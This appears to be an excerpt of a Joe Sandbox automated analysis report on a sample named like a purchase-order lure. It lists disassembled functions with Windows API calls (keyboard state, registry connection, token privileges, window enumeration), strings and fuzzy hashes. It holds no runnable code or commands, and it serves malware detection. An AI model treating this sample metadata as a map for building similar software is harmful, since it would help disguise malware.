Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7

Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479

Strings

HH, xrefs: 0046B3D0

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ConnectRegistry_wcslen
String ID: HH
API String ID: 535477410-2761332787
Opcode ID: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
Opcode Fuzzy Hash: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A

Function 00460473 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 004604B5
GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
_wcslen.LIBCMT ref: 00460502
CharUpperBuffW.USER32(?,00000000), ref: 00460510
GetClassNameW.USER32(?,?,00000400), ref: 00460589
GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
GetClassNameW.USER32(?,?,00000400), ref: 00460606
GetClassNameW.USER32(?,?,00000400), ref: 0046063E
GetWindowRect.USER32(?,?), ref: 004606AD

Strings

ThumbnailClass, xrefs: 00460594, 0046060D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
String ID: ThumbnailClass
API String ID: 4123061591-1241985126
Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB

Function 0046F50B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 157windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC

DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
ImageList_EndDrag.COMCTL32 ref: 0046F583
ReleaseCapture.USER32 ref: 0046F589
SetWindowTextW.USER32(?,00000000), ref: 0046F620
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630

Strings

HH, xrefs: 0046F686
@GUI_DROPID, xrefs: 0046F65F
@GUI_DRAGFILE, xrefs: 0046F694

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
API String ID: 2483343779-2060113733
Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA

Function 0046FD7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
GetClientRect.USER32(?,?), ref: 0046FEF2
RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
DestroyIcon.USER32(?), ref: 0046FFCC

Strings

2, xrefs: 0046FE9D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
String ID: 2
API String ID: 1331449709-450215437
Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A

Function 00450E7D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1

Strings

static, xrefs: 00450EC3

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: DestroyWindow
String ID: static
API String ID: 3375834691-2160076837
Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69

Function 004393E2 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
_memcmp.LIBCMT ref: 004394A9
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8

Strings

SeAssignPrimaryTokenPrivilege, xrefs: 00439455
SeIncreaseQuotaPrivilege, xrefs: 0043946A

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
API String ID: 1446985595-805462909
Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA

Function 0045D83D Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 86COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0045D848
GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A

Strings

HH, xrefs: 0045D921
RAMDisk, xrefs: 0045D901
Network, xrefs: 0045D8E1
Unknown, xrefs: 0045D911
CDROM, xrefs: 0045D8F1
Removable, xrefs: 0045D8C1
Fixed, xrefs: 0045D8D1

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
API String ID: 2907320926-41864084
Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB

Function 00467214 Relevance: 16.8, APIs: 11, Instructions: 313COMMON

Download Yara Rule

APIs

SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID:
API String ID: 1932665248-0
Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B

Function 004480F2 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
GetWindowLongW.USER32(?,000000F0), ref: 004481A7
_memset.LIBCMT ref: 004481BA
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56

Function 0046EA7F Relevance: 16.7, APIs: 11, Instructions: 167windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE

DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
ImageList_Destroy.COMCTL32(?), ref: 0046EB04
ImageList_Destroy.COMCTL32(?), ref: 0046EB18
ImageList_Destroy.COMCTL32(?), ref: 0046EB24
DeleteObject.GDI32(00000000), ref: 0046EB4F
DestroyIcon.USER32(00790053), ref: 0046EB67
DeleteObject.GDI32(ECF1F62E), ref: 0046EB7F
DestroyWindow.USER32(004D0041), ref: 0046EB97
DestroyIcon.USER32(?), ref: 0046EBBF
DestroyIcon.USER32(?), ref: 0046EBCD

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
String ID:
API String ID: 802431696-0
Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E

Function 00444D52 Relevance: 16.6, APIs: 11, Instructions: 132keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,?,?), ref: 00444D8A
GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
GetKeyState.USER32(000000A0), ref: 00444E26
GetAsyncKeyState.USER32(000000A1), ref: 00444E40
GetKeyState.USER32(000000A1), ref: 00444E51
GetAsyncKeyState.USER32(00000011), ref: 00444E69
GetKeyState.USER32(00000011), ref: 00444E77
GetAsyncKeyState.USER32(00000012), ref: 00444E8F
GetKeyState.USER32(00000012), ref: 00444E9D
GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
GetKeyState.USER32(0000005B), ref: 00444EC3

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA

Function 004507E7 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
_wcslen.LIBCMT ref: 00450944
_wcscat.LIBCMT ref: 00450955
SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
SendMessageW.USER32(?,00001061,?,?), ref: 0045099B

Strings

SysListView32, xrefs: 00450893
-----, xrefs: 0045094F

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$Window_wcscat_wcslen
String ID: -----$SysListView32
API String ID: 4008455318-3975388722
Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65

Function 00448602 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00448625
CreateMenu.USER32 ref: 0044863C
SetMenu.USER32(?,00000000), ref: 0044864C
GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
IsMenu.USER32(?), ref: 004486EB
CreatePopupMenu.USER32 ref: 004486F5
InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
DrawMenuBar.USER32 ref: 00448742

Strings

0, xrefs: 0044861D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0
API String ID: 176399719-4108050209
Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6

Function 004691F4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
GetDlgCtrlID.USER32(00000000), ref: 00469289
GetParent.USER32 ref: 004692A4
SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
GetDlgCtrlID.USER32(00000000), ref: 004692AE
GetParent.USER32 ref: 004692C7
SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA

Strings

ListBox, xrefs: 00469230
ComboBox, xrefs: 004691FF

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend$CtrlParent$_wcslen
String ID: ComboBox$ListBox
API String ID: 2040099840-1403004172
Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9

Function 004693F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 87windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
GetDlgCtrlID.USER32(00000000), ref: 00469483
GetParent.USER32 ref: 0046949E
SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
GetDlgCtrlID.USER32(00000000), ref: 004694A8
GetParent.USER32 ref: 004694C1
SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4

Strings

ListBox, xrefs: 0046942C
ComboBox, xrefs: 004693FB

Memory Dump Source

